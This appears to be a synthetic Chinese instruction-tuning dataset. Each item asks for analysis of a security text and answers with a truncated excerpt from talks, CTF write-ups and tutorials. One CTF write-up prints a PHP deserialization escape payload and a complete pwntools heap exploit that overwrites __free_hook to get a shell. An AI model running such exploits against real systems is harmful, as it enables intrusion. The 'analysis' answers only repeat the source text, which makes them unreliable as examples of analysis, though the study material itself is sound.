{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://www.sincuser.f9.co.uk/035/htsquad.htm How to channel your inner Henry Rollins By Jayson E. Street https://www.defcon.org /html/links/dc- speakerscorner.html #wiseman-street I care less if I can't be part of your scene because I am the scene. I am everything that is. If you're listening to a rock star in order to get your information on who to vote for, you're a bigger moron than they are. Life is too short to have anything but delusional notions about yourself. I feel uncomfortable because I'm insecure about who I am. Nothing is as important as passion. No matter what you want to do with your life, be passionate. If you know something, share it. If you learn something, learn more. When you really know your stuff, teach it. Adam Laurie (Major Malfunction) We protect you from people like us. Remember if this dweeb can eventually speak at DEFCON SO CAN YOU!   http://www.dissectingthehack.com  http://f0rb1dd3n.com  https://issa.org/  http://www.infragard.net/  http://netragard.com  @jaysonstreet on Twitter Discussion and Questions???? Or several minutes of uncomfortable silence its your choice. This concludes my presentation Thank You  http://www.dissectingthehack.com  http://f0rb1dd3n.com  https://issa.org/  http://www.infragard.net/  http://netragard.com  @jaysonstreet on Twitter", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安洵杯 Writeup 1 安洵杯 Writeup Author:Nu1L Web cssgame 参考https://www.smi1e.top/通过css注窃取html中的数据/ 环境有点不同不太好动化写了个脚本键成css件启了个httpserver然后动位位的跑就了 Web cssgame iamthinking easy_serialize_php easy_web Pwn Heap RE Crackme EasyEncryption game Misc 吹着斯扫维码 Attack music Crypto This_is_not_a_standard_AES256 funney-php justaBase 安洵杯 Writeup 2 iamthinking www.zip得到源码tp6pop链打下就了 easy_serialize_php filter存在过滤然后逃逸反序列化数据就好了利数组即可payload: _SESSION[veneno][1]=phpphpphpphp&_SESSION[veneno] [2]=;i:2;s:66:\"111111111111111111111111111111111111111111111111111111111111111111\";}s:3:\"img\";s:20:\"L2QwZzNfZmxsbGxsbGFn\";} easy_web img参数base64两次decode发现是hex编码然后拿到index.php源码然后\\绕过执命令就好了 Pwn Heap from pwn import * r = lambda: p.recv() rn = lambda x: p.recv(x) ru = lambda x: p.recvuntil(x, drop = True) rl = lambda: p.recvline() s = lambda x: p.send(x) sa = lambda x,y: p.sendafter(x,y) sla = lambda x,y: p.sendlineafter(x,y) def alloc(idx,size,cnt): sla(\">> \",str(1)) sla(\"(0-10):\",str(idx)) sla(\"size:\\n\",str(size)) sa(\"content: \\n\",cnt) def free(idx): sla(\">> \",str(2)) 安洵杯 Writeup 3 sla(\"index:\\n\",str(idx)) def edit(idx,cnt): sla(\">> \",str(4)) sla(\"index:\\n\",str(idx)) sa(\"content: \",cnt) def hack(r): sla(\"name: \",\"%4$p%11$p\") ru(\"Hello, \") if r: libc.address = int(rn(14)[2:],16)-0x5ed700 else: libc.address = int(rn(14)[2:],16)-0x5ed700 log.info('libc.address:'+hex(libc.address)) proc = int(rn(14)[2:],16)-0x1186 log.info('proc'+hex(proc)) alloc(0,0x88,'/bin/sh\\x00\\n') alloc(1,0x88,'b\\n') alloc(2,0x88,'c\\n') alloc(3,0x88,'d\\n') alloc(4,0xf8,'e\\n') alloc(5,0x88,'f\\n') payload = \"\\x00\"*0x10 payload += p64(proc+0x202090-0x18)+p64(proc+0x202090-0x10) payload = payload.ljust(0x80,'\\x00') payload += p64(0x80) edit(3,payload+'\\n') free(4) edit(3,p64(0x88)+p64(libc.sym['__free_hook'])+p64(0x8)+'\\n') edit(2,p64(libc.sym['system'])+'\\n') free(0) p.interactive() if __name__ == '__main__': context.binary = './pwn1' context.terminal = ['tmux', 'sp', '-h','-l','115'] context.log_level = 'debug' elf = ELF('./pwn1') if len(sys.a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nxbeark-javaopenrasp源码阅读 项地址 https://github.com/xbeark/javaopenrasp 简介 随便看了下这个算是不太难并且适合我这种初学者啰简单看看ReadMe可以发现实现 了些基本功能这我们了解他的基本实现思路即可 阅读本项到的ASM相关前置知识 btw只搞些较重要的点先我们知道在ASM CORE API当中有个较重要的点是 ClassReaderClassVisitorClassWriter以及AdviceAdapter这不会讲代码怎么写只是告诉 这是嘛的便于对代码架构的理解 ClassReader/ClassWriter 稍微不是那么重要点这只说下具体作它负责读取.class件的内容然后拆分 成各个不同的部分其实就是与类件的组成有关这对代码理解没意义,ClassWriter也 真是将拆分的部分重新组合 ClassVisitor ClassVisitor是访问者模式的逻辑 在ClassVisitor类当中定义了多个visit开头的法这些法的参数也与ClassFile结构密切相 关这些法遵循定的调顺序来官档 当然这有必要对其中些东西做个简单说明 [] : 表最多调次可以不调但最多调次 () 和 | : 表多个法之间可以选择任意个并且多个法之间不分前后顺序 * : 表法可以调0次或多次 visit [visitSource][visitModule][visitNestHost][visitPermittedSubclass] [visitOuterClass] ( visitAnnotation | visitTypeAnnotation | visitAttribute )* ( visitNestMember | visitInnerClass | visitRecordComponent | visitField | visitMethod )* visitEnd AdviceAdapter 在AdviceAdapter类的法中定义了两个重要的法onMethodEnter()法和onMethodExit() 法顾名思义 onMethodEnter在法进时添加些代码逻辑 onMethodExit在法退出时添加些代码逻辑 因此我们可以通过实现定义AdviceAdapter在法体进的部分(onMethodEnter)插我们 的拦截代码实现监控 ok致扫盲了遍可以去深阅读源码了 源码阅读正 先关注 xbear.javaopenrasp.Agent 可以看见只实现了 premain 的式也就是启动 前加载 配置初始化 public class Agent { public static void premain(String agentArgs, Instrumentation inst) throws ClassNotFoundException, UnmodifiableClassException { Console.log(\"init\"); init(); inst.addTransformer(new ClassTransformer()); } private static boolean init() { Config.initConfig(); return true; } } 删除了部分没必要的影响阅读的代码 先是配置的初始化 init ,调的 是 xbear.javaopenrasp.config.Config#initConfig 先通过 readConfig 法将配 置件内容读其实只是个读件的法之后会解析这个 main.config件 这个 件内容是符合json格式 String configStr = readConfig(\"/main.config\"); Map configMap = (Map) JSONUtils.parse(configStr); List<Map> moudleList = (List<Map>) configMap.get(\"moudle\"); for (Map m: moudleList) { Map<String, Object> tmpMap = new ConcurrentHashMap<String, Object>(); tmpMap.put(\"loadClass\", m.get(\"loadClass\")); tmpMap.put(\"mode\", m.get(\"mode\")); tmpMap.put(\"whiteList\", new CopyOnWriteArrayList<String>((Collection) m.get(\"whiteList\"))); tmpMap.put(\"blackList\", new Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n护 网 的 起 源 和 演 变 01 未 知 攻  焉 知 防 02 实 战 出 真 知 03 目 录 CONTENTS 护网的起源和演 变 PART 1 护 网 的 起 源 和 演 变  新 形 势 下 攻 防 对 抗 法律法规 国家标准 基线检查 渗透测试 国家 层面 APT 组织型 常态化攻防演练 新的验证体系 监管要求 国际标准规范 旧的验证体系 安全检查 漏洞扫描 思路转变 验证体系思路转变  锁 盾  攻 防 演 习  Locked Shields系列演习是北约年度例行性网络 安全演习于2010年启动  模式假想国家Berylia  目标攻击模拟的海军基地电站等关键信息基础 设施  时长5天  2018年演习 参演人数1000参演国家30攻击 次数2500虚拟系统4000个  2019年由北约总部牵头在爱沙尼亚和芬兰国防军 美军欧洲司令部韩国国家安全研究院以及西门子 思科等科技公司的协助下开展演习  网 络 风 暴  攻 防 演 习  美国国土安全部DHS主导2006年开始每2 年举行一次  目的侧重于考察跨国家政府机构等针对关键基 础设施遭到网络攻击的情况下的协调应急能力政 府-企业+各国政府 评估信息共享流程加强多 国合作  形式60支队伍模拟攻击关键基础设施  时间1周  特色模拟社交网络披露漏洞/物理攻击等 护 网 的 起 源 和 演 变  国 外 网 络 安 全 攻 防 演 习 护 网 的 起 源 和 演 变  护 网 行 动  网 络 攻 防 演 习 概述 护网行动网络攻防演习是由公安机关组织的覆盖政府能源交通卫生金融教育等 行业的集中网络攻防演练行动  时间23周 方式组织120~130支攻击队伍对各行业重点单位150余家目标系统进行集中攻击检验防守 方对攻击的防护能力以积分形式确定防守方排名  特点高度仿真的APT攻击测试人员更关注权限和数据 参演方  攻击方由公安机关授权的国家科研机构安全公司/团队组成  防守方防守企业  指挥部根据攻守双方报告信息进行评分 2019 2018 2017 2016 试点阶段 无经验担心出 问 题 攻击思路 传统攻击行为互联 网突破旁站攻击 内网跨域 拓展阶段 监管利器被监管 单 位认知不足 攻击思路 传统攻击行为互联网 突破旁站攻击内网 跨域 认可阶段 头部企业认可部 分 行业开始组织演 练 攻击思路 传统攻击行为互联网 突破内网跨域邮箱 系统免杀工具 普及阶段 强信息化机构普 遍 尝试实战演练 攻击思路 传统攻击行为互联网突 破内网跨域开始使用 0Day邮箱系统社工 攻击物理设备 2020 常态化/推广阶段 扩大演练覆盖面向 常 态化转变 攻击思路 传统攻击行为互联网突 破内网跨域更多0Day 邮箱系统免杀工具社 工攻击物理设备 护 网 的 起 源 和 演 变   护 网 行 动  发 展 史 护 网 的 起 源 和 演 变  攻 击 方 简 要 计 分 规 则  参 考  低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 靶标系统拿下后防守企业可能 退出演习  单项得分和总分均有上限  提交0Day漏洞有加分有上限  被溯源/反制的攻击队将被扣分 护 网 的 起 源 和 演 变  防 守 方 简 要 计 分 规 则  参 考  低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 发现并处置攻击提交报告 可加分但加分小于扣分 溯源攻击者身份可额外加分 反制攻击者也有加分  总结报告分数有一定占比 攻击方得分则防守方失 分 护 网 的 起 源 和 演 变  新 形 势 下 攻 防 对 抗 HW小插曲木桶短板 目标数据库系统经测试无任何安全隐患渗透过程中发现测试环境数据库账号密码明文存 储经测试和目标数据库系统账号密码一致导致目标系统被攻陷 1. 发现真实攻击的能力 2. 应对真实攻击的能力 防护 人员 流程 技术 体系 组织 制度 措施 验证体系变化的影响 通过攻防实战的形式验证点线面的安全性实实在在地提升安全对抗能力 护 网 的 起 源 和 演 变  2020攻 防 演 练 变 化  防守方发现种类由8种变成3种  溯源得分需要在攻击成功之后 类 别  防守报告上限 50 次 报 告  总结报告得分减少由2000分变为1000分  不提交总结报告扣1000分  增加沙盘推演DDOS攻击  优化各个细节更贴近实战环节 流 程 优秀攻击队 攻击联队 重要行业代表 防守方 沙盘推演 护网最优秀的攻击队组成联合攻击队对重要行业攻击情 况展开沙盘推演每个行业代表现场需要进行两轮沙盘", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll your family secrets belong to us - Worrisome security issues in tracker apps Siegfried Rasthofer | Fraunhofer SIT, Germany Stephan Huber | Fraunhofer SIT, Germany DefCon26, August 11th 2018 Who are we?  Head of department Secure Software Engineering  PhD, M.Sc., B.Sc. in computer science  Static and dynamic code analysis  Founder of @TeamSIK and @CodeInspect  Security researcher @Testlab Mobile Security  Code analysis tool development  IOT stuff  Founder of @TeamSIK Siegfried Stephan 2 Who are we? Siegfried Stephan (creds to: Alex, Daniel, Julien, Julius, Michael, Philipp, Steven, Kevin, Sebald, Ben) 3  Head of department Secure Software Engineering  PhD, M.Sc., B.Sc. in computer science  Static and dynamic code analysis  Founder of @TeamSIK and @CodeInspect  Security researcher @Testlab Mobile Security  Code analysis tool development  IOT stuff  Founder of @TeamSIK Beer Announcement 4 Agenda  Motivation  Background Information  Client-Side Authorization  Client-Side and Communication Vulnerabilities  Server-Side Vulnerabilities  Responsible Disclosure Process  Summary 5 Agenda  Motivation  Background Information  Client-Side Authorization  Client-Side and Communication Vulnerabilities  Server-Side Vulnerabilities  Responsible Disclosure Process  Summary 6 Surveillance - Then 1960: Radio receiver inside pipe 1970: Microphone inside a dragonfly * Source: http://www.businessinsider.com/ 1960: Camera inside a pack of cigarettes 7 Surveillance - Now Spyware/RAT 8 Surveillance - Now Benign Reasons? Spyware/RAT 9 Surveillance - Now Benign Reasons? Family Couple Friends 10 Good vs. Bad Family Couple Friends Spyware/RAT 11 Surveillance - Apps *Android Security Report 2017 Google Play Store 12 How well is the collected data protected? 13 App Name Google Play Store Installations Couple Tracker App 5-10 m My Family GPS Tracker KidControll GPS Tracker Rastrear Celular Por el Numero Phone Tracker By Number Couple Vow Real Time GPS Tracker Ilocatemobile 1-5m Family Locator (G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows Internals Seventh Edition Part 2 Andrea Allievi Alex Ionescu Mark E. Russinovich David A. Solomon  Windows Internals, Seventh Edition, Part 2 Published with the authorization of Microsoft Corporation by: Pearson Education, Inc. Copyright  2022 by Pearson Education, Inc. All rights reserved. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, request forms, and the appropriate contacts within the Pearson Education Global Rights & Permissions Department, please visit www.pearson.com/permissions. No patent liability is assumed with respect to the use of the information contained herein. Although every precaution has been taken in the preparation of this book, the publisher and author assume no responsibility for errors or omissions. Nor is any liability assumed for damages resulting from the use of the information contained herein. ISBN-13: 978-0-13-546240-9 ISBN-10: 0-13-546240-1 Library of Congress Control Number: 2021939878 ScoutAutomatedPrintCode TRADEMARKS Microsoft and the trademarks listed at http://www.microsoft.com on the Trademarks webpage are trademarks of the Microsoft group of companies. All other marks are property of their respective owners. WARNING AND DISCLAIMER Every effort has been made to make this book as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is on an as is basis. The author, the publisher, and Microsoft Corporation shall have neither liability nor responsibility to any person or entity with respect to any loss or damages arising from the information contained in this book or from the use of the programs accompanying it. SPECIAL SALES For information about buying this title in bulk quantities, or for special sales opportunit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nObserved Answers Record Type Usage Sources Ports _afpovertcp._tcp.local PTR Hosts (Apple) N/A _axis-video._tcp.local PTR Cameras (Axis) N/A _blackarmor4dconfig._tcp.local PTR Network Attached Storage (Seagate) N/A _blackarmor4dinfo._udp.local PTR Network Attached Storage (Seagate) N/A _ftp._tcp.local PTR Printers (HP) N/A _http._tcp.local PTR Printers (HP), Network Attached Storage (Seagate), Cameras (Axis) N/A _home-sharing._tcp.local PTR Hosts (Windows(7)) N/A _ipp._tcp.local PTR Printers (HP) N/A _libvirt._tcp.local PTR Hosts (Linux) N/A _net-assistant._udp.local PTR Hosts (Apple) N/A _odisk._tcp.local PTR Hosts (Apple) N/A _pdl-datastream._tcp.local PTR Printers (HP) N/A _printer._tcp.local PTR Printers (HP) N/A _rfb._tcp.local PTR Hosts (Apple) N/A _rtsp._tcp.local PTR Cameras (Axis) N/A _services._dns-sd._udp.local PTR Hosts (Apple), Hosts (Linux) N/A _sftp-ssh._tcp.local PTR Hosts (Apple), Hosts (Linux) N/A _smb._tcp.local PTR Network Attached Storage (Seagate) N/A _ssh._tcp.local PTR Hosts (Apple), Hosts (Linux) N/A _telnet._tcp.local PTR Printers (HP) N/A _udisks-ssh._tcp.local PTR Hosts (Linux) N/A _workstation._tcp.local PTR Hosts (Linux) N/A By Type Observed Answers Record Type Usage Sources Ports HostName ._afpovertcp._tcp.local SRV Hosts (Apple) 548 HostName ._axis-video._tcp.local SRV Cameras (Axis) 80 HostName ._blackarmor4dconfig._tcp.local SRV Network Attached Storage (Seagate) 4301 HostName ._blackarmor4dinfo._udp.local SRV Network Attached Storage (Seagate) 4301 HostName ._ftp._tcp.local SRV Printers (HP) 21 HostName ._http._tcp.local SRV Printers (HP), Network Attached Storage (Seagate), Cameras (Axis) 80 SharePath ._home-sharing._tcp.local SRV Hosts (Windows(7)) 3689 HostName ._ipp_tcp.local SRV Printers (HP) 631 Virtualization Host HostName ._libvirt._tcp.local SRV Hosts (Linux) 0 HostName._ migo._tcp.local SRV Kiosks (?) 5353 HostName ._net-assistant._udp.local SRV Hosts (Apple) 3283 HostName ._odisk._tcp.local SRV Hosts (Apple) 49152 HostNam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 27, Las Vegas 2019 Breaking the back end! Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview Transit System Reverse Engineering My Discoveries The Exploit The Lessons How This Is Different This is not illegal We arent sneaking into the station We arent hacking their terminals We arent social engineering anyone or attacking their wired/wireless network This is not about the hardware We arent cracking anyones encryption We arent cloning the magstripe, RFID, or NFC How This Is Different This Is About Flaws in the Application Logic OK. Cloning is involved but it is not the vulnerability exploited Using AppSec to attack Complex Multi-Layered Real World Solutions Elevated Train Bangkok Mass Transit System (BTS) Elevated rapid transit system in Bangkok, Thailand Serves Greater Bangkok Area Operated by Bangkok Mass Transit System PCL (BTSC) 43 stations along two lines Tickets Stored-Value Card (NFC) All Day Pass (Magstripe) and Single Journey (Magstripe) Two magstripes Hole through one magstripe Only 0.27mm thick Tickets Tickets Tickets The Equipment Standard Reader/Writer Manufactured in China Standards or Raw Read Errors Rare Reliable Performance Lab Work Attempted Decode Using Standards International Organization for Standardization 6-bit Character sets and 4-bit Character sets Some With Parity and Some Without Attempted Decode both forwards and backwards It wasnt using the standards Lab Work There is no encryption. There are no parity checks There was no longitudinal redundancy check (LRC) There are no timestamps Field Work * The section 7826 is the Ticket Type * The section 00FF74 is always 100 + the price of the ticket * For all day passes, the section 00FF74 is used to track trips taken Field Work GUID GUID GUID Station Dispenser Station Turn-style Field Work Handling Rules To Enter, Ticket must have previously been in Collected State Ticket Must Be Now Be In Issued State To Exit, Ticket Must Be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## AJAX > 用 JS 实现页面的局部更新 ### 简介 - AJAX = Asynchronous JavaScript and XML异步的 JavaScript 和 XML - AJAX 不是新的编程语言而是一种使用现有标准的新方法 - AJAX 是与服务器交换数据并更新部分网页的艺术在不重新加载整个页面的情况下 ### AJAX工作原理 ![AJAX工作原理图](../img/ajax.jpg) ### 请求方法 方法参数 | 描述 ----------------------------------- | ---------------------------------------------------- axios.request(config) | 未指名的请求请求方法在 config 中指定 axios.get(url[, config]) | 索取数据一般只向服务器发送简单的数据 axios.delete(url[, config]) | 删除某一个资源一般很少用到 axios.head(url[, config]) | 判断资源是否存在HEAD不含有呈现数据而仅仅是HTTP头信息 axios.post(url[, data[, config]]) | 提交数据发送用户输入不是采用7位的ASCII编码数据URL过长 axios.put(url[, data[, config]]) | 更新请求一般需要一个完整的 UserInfo axios.patch(url[, data[, config]]) | 局部更新表示该请求是一个局部更新后端仅更新接收到的字段 ### `XMLHttpRequest`对象 `XMLHttpRequest`用于在后台与服务器交换数据这意味着可以在不重新加载整个网页的情况下对网页的某部分进行更新 **创建`XMLHttpRequest`对象的语法** ``` var xml = new XMLHttpRequest() ``` ### 请求 **向服务器发送请求** ``` xml.open('method','url',async); ``` - method请求的类型GET 或 POST - url文件在服务器上的位置 - asynctrue异步或 false同步 **将请求发送到服务器** ``` xml.send(string) ``` string仅用于 POST 请求 **例**发送一个`GET`请求 ``` var xml = new XMLHttpRequest() xml.open('GET','https://api.github.com/users/l552177239',true) xml.send() ``` **向一个POST请求添加请求头** 如果需要像 HTML 表单那样 POST 数据请使用`setRequestHeader()`来添加 HTTP 头然后在`send()`方法中规定您希望发送的数据 ``` setRequestHeader(header,value) ``` - header: 规定头的名称 - value: 规定头的值 **例**通过`access token`发送一个登陆的`POST`请求, ``` xml.open('POST','https://cnodejs.org/api/v1/accesstoken',true); xml.setRequestHeader(\"Content-type\",\"application/json\"); let date = { accesstoken:'3f77acb1-d753-4393-b784-44913190e6a8' } xml.send(JSON.stringify(date)) ``` ### 响应 **服务器响应** 如需获得来自服务器的响应请使用`XMLHttpRequest`对象的`responseText`或`responseXML`属性 属性 | 描述 --------------- | ------------------------------------------ responseText | 获得字符串形式的响应数据 responseXML | 获得 XML 形式的响应数据 将服务器返回的数据转换为字符串 ``` var text = JSON.parse(xml.responseText) ``` ### `onreadystatechange`事件 XMLHttpRequest 对象的三个重要的属性 属性 | 描述 -------------------- | --------------------------------------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# pdb --- ## Pdb命令列表 ``` h: (help) 帮助 c: (continue) 继续执行 w: (where) 显示当前正在执行的代码行的上下文信息 a: (args) 打印当前函数的参数列表 s: (step) 执行当前代码行并停在第一个能停的地方相当于单步进入 n: (next) 继续执行到当前函数的下一行或者当前行直接返回单步跳过 d: (down) 执行跳转到在当前堆栈的深一层 u: (up) 执行跳转到当前堆栈的上一层 l: (list) 列出源码 r: (return) 执行当前运行函数到结束 b: (break) 添加断点 p expression: (print) 输出expression的值 pp expression: 好看一点的p expression q: (quit) 退出debug 单步跳过next和单步进入step的区别: 单步进入会进入当前行调用的函数内部并停在里面 单步跳过会几乎全速执行完当前行调用的函数并停在当前函数的下一行 ``` ## 配置环境 **单步调试** ```bash git clone https://github.com/ffffffff0x/name-fuzz.git pip3 install pyreadline pypinyin cd name-fuzz python3 -m pdb name-fuzz.py ``` **设置断点** ```python import pdb s = '0' n = int(s) pdb.set_trace() #运行到这里会自动暂停 print(10/n) ``` 运行上面的脚本在print前自动暂停调试 --- ## Source & Reference - [Flask debug 模式 PIN 码生成机制安全性研究笔记](https://zhuanlan.zhihu.com/p/32336971) - [Python 调试器之pdb](https://www.cnblogs.com/xiaohai2003ly/p/8529472.html)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nunixsocket 0x00 httpburphttptcptcptcpdump tcp sslvpnunixsocket unixsocket 0x01 unix socket unix socketsockettcpudpunixsocketsocket unixsocketsocket tcpsocketunixsocket unixsocket netstatunixsocket webunixsocket netstat netstat -alnp unixsocketunixsocket 0x02 #!/bin/bash #!/bin/bash # Parameters socket=\"/run/foo.sock\" //unixsocket dump=\"/tmp/capture.pcap\" // # Extract repetition port=9876 //tcp source_socket=\"$(dirname \"${socket}\")/$(basename \"${socket}\").orig\" // # Move socket files mv \"${socket}\" \"${source_socket}\" //mvsocket trap \"{ rm '${socket}'; mv '${source_socket}' '${socket}'; }\" EXIT //trap rm xxxx # Setup pipe over TCP that we can tap into socat -t100 \"TCP-LISTEN:${port},reuseaddr,fork\" \"UNIX-CONNECT:${source_socket}\" & socat -t100 \"UNIX-LISTEN:${socket},mode=777,reuseaddr,fork\" \"TCP:localhost:${port}\" & //socatunixsockettcptcpdumptcptcpunixsocket # Record traffic //tshark -i lo -w \"${dump}\" -F pcapng \"dst port ${port} or src port ${port}\" tcpdump -i lo -w \"${dump}\" \"port ${port}\" //tsharktcpdumptcpdump 1. unixsocket 2. unixsocketmvfd 3. socatunixsocket 4. socatsocketsocattcp 5. sockettcpsocket 6. tcptcpdump 0x03 socatsocatsocatsocat unixsocket tcpdumpwireshark tcptcp follow payloadxml 0x04 unixsocket", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTaking your ball and going home; building your own secure storage space that mirrors Dropbox's functionality Phil Cryer (@fak3r) open source technologist DEFCON 19 - August 2011 $ whoami phil $ whoami phil $ alias phil=@fak3r http://afistfulofsoundtracks.blogspot.com $ whoami phil $ alias phil=@fak3r $ cat brief_bio - employed as a systems engineer - security researcher and privacy advocate (EFF) - currently working on sharing biodiversity data - aim to balance security with openness - have worked with Linux and open source for over ten years http://dropbox.com Always have your stuff, wherever you are. http://dropbox.com Brief history 2007 June - founded, receives series A funding 2007 September - receives $1.2M in seed funding (Y Combinator) 2007 October - receives $6M in Series A funding 2008 Fall - secures $7.2M Series A funding (Sequoia Capital, Accel Partners) http://www.crunchbase.com/company/dropbox Dropbox enables people to sync files and media across platforms and devices, in order to have them available from any location. The service also allows people to easily and quickly share files with others. Dropbox provides users with 2 GB of space for free, and they can pay for more. http://techcrunch.com/2011/04/17/dropbox-hits-25-millions-users-200-million-files-per-day People use Dropbox for personal storage, file syncing between machines, and group collaboration on projects. They have desktop software for the usual OSs (Mac OSX, Linux and Windows) and mobile access, that makes things run smoothly. http://techcrunch.com/2011/04/17/dropbox-hits-25-millions-users-200-million-files-per-day Current growth 2009 2 millions users 2010 4 million users 2011 April - Dropbox claims to have 25 million users of its free service http://techcrunch.com/2011/04/17/dropbox-hits-25-millions-users-200-million-files-per-day Today, Dropbox has 25 million users and 200 million files are saved daily, and more than 1 million every five minutes. http://techcrunch.com/2011/04/17/dropbox-hits-25-m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGTVHACKER Google TV Or: How I Learned to Stop Worrying and Exploit Secure Boot GTVHACKER GTVHacker: The Team  GTVHacker is a group of 6 hackers with individual skill sets who work together to unlock Google TV devices.  Our primary goal is to bypass hardware and software restrictions to allow for unsigned kernels to be loaded and used.  To date the team has released multiple methods for unlocking Google TV devices.  The GTVHacker team won a $500 bounty for being the first to root the Google TV.  We hack things because we believe in open and free hardware. Our current target just happens to be the Google TV. h#p://DC21.GTVHacker.com 2 GTVHACKER Members Mike Baker ([mbm])- Firmware developer and co-founder of OpenWRT Hans Nielsen (AgentHH) Senior Security Consultant at Matasano CJ Heres (cj_000)  IT Systems Manager gynophage  He's running that big ole DEFCON CTF right now Tom Dwenger (tdweng) Excellent with APK reversing and anything Java Amir Etemadieh (Zenofex)  Research Scientist at Accuvant LABS, founded GTVHacker h#p://DC21.GTVHacker.com 3 GTVHACKER What's the Google TV?  Google TV is a platform that: o Bridges the gap between your TV and an Android device. o Creates an overlay on television stream and also contains an IR transmitter to transmit to media center devices (cable box, TV, sound system). o Receives over-the-air updates automatically from OEM manufacturers. o Contains a forked version of Chrome with all plugins and extensions disabled. o Was originally released without the Android Market available but was eventually updated to include it. o Provides a built-in Flash Player, however most content providers block the Google TV. h#p://DC21.GTVHacker.com 4 GTVHACKER Why We Hack It Just a few reasons why we targeted the platform:  Locked bootloader  Heavily restricted kernel preventing user modifications  Generation 1 EOL  Crippled Flash Player In short, the Google TV devices are locked down and crippled by their limitations. Our goal is to change that. h#p:/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTime  estomping time For our guests from England, please allow me to translate.  ng tompin timest Quick background File Creation Date Last Accessed File 127 08/04/11 10:22:36 08/04/11 10:22:3 File 128 08/04/11 10:22:37 08/04/11 10:22:3 File 129 08/04/11 10:22:37 08/04/11 10:22:3 File 130 08/04/11 10:22:37 08/04/11 10:22:3 File 131 08/04/11 10:22:38 08/04/11 10:44:1 Timestamps are important in forensic analysis. File 131 08/04/11 10:22:38 08/04/11 10:44:1 File 132 08/04/11 10:22:41 08/04/11 10:22:4 File 133 08/04/11 10:22:42 08/04/11 10:22:4 Timeline analysis is part of event reconstruction. File 134 08/04/11 10:22:43 08/04/11 10:22:4 File 135 08/04/11 10:22:43 08/04/11 10:54:0 File 136 08/04/11 10:22:43 08/04/11 10:22:4 Note: Timestamps and events are analyzed in context, not isolation. File 137 08/04/11 10:22:45 08/04/11 10:22:4 File 138 08/04/11 10:22:46 09/06/06 08:00:0 Fil 139 08/04/11 10 22 47 08/04/11 10 22 4 File 139 08/04/11 10:22:47 08/04/11 10:22:4 File 140 08/04/11 10:22:47 08/04/11 10:22:4 File 141 08/04/11 10:22:47 08/04/11 10:39:5 File 142 08/04/11 10:22:48 08/04/11 10:22:4 File 143 08/04/11 10:22:54 08/04/11 10:22:5 File 144 08/04/11 10:22:58 08/04/11 10:22:5 To hide activities, the computers clock could be changed. That poses a separate set of problems and leaves its own trail of evidence. Antiforensic demonstration of timestomp.exe at BlackHat 2005 AttributeMagic has since joined the scene. The tools modify timestamps (Created, Accessed, Modified, MFT Entry) to fool an unsuspecting user. But heres the rub: The tools dont modify all timestamps and they dont look for all artifacts. There are eight timestamps, not four, associated with a file on NTFS file systems. All eight timestamps are in $MFT All eight timestamps are in $MFT. $STANDARD_INFORMATION Type: 0x10 $FILE_NAME Type: 0x30 Type: 0x10 Min Size: 0x30 Max Size: 0x48 Type: 0x30 Min Size: 0x44 Max Size: 0x242 Read offset to attribute content and add:  Created (0x00)  Last Modified (0x08) Read off", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# House of Roman ## 介绍 House of Roman 这个技巧说简单点其实就是 fastbin attack 和 Unsortbin attack 结合的一个小 trick ## 概括 该技术用于 bypass ALSR利用12-bit 的爆破来达到获取shell的目的且仅仅只需要一个 UAF 漏洞以及能创建任意大小的 chunk 的情况下就能完成利用 ## 原理以及展示 作者提供给了我们一个 demo 用于展示整个利用过程大概可以分为三步骤 1. 将 FD 指向 malloc_hook 2. 修正 0x71 的 Freelist 3. 往 malloc_hook 写入 one gadget 先对 demo 进行一个大致的分析 开启的保护情况 ```bash [*] '/media/psf/Home/Desktop/MyCTF/House-Of-Roman/new_chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled ``` 样题中有三个主要功能Malloc Write以及 Free ```c switch ( v4 ) { case 1: puts(\"Malloc\"); v5 = malloc_chunk(\"Malloc\"); if ( !v5 ) puts(\"Error\"); break; case 2: puts(\"Write\"); write_chunk(\"Write\"); break; case 3: puts(\"Free\"); free_chunk(); break; default: puts(\"Invalid choice\"); break; ``` 在 Free 功能中存在 指针未置零而造成的悬挂指针 ```c void free_chunk() 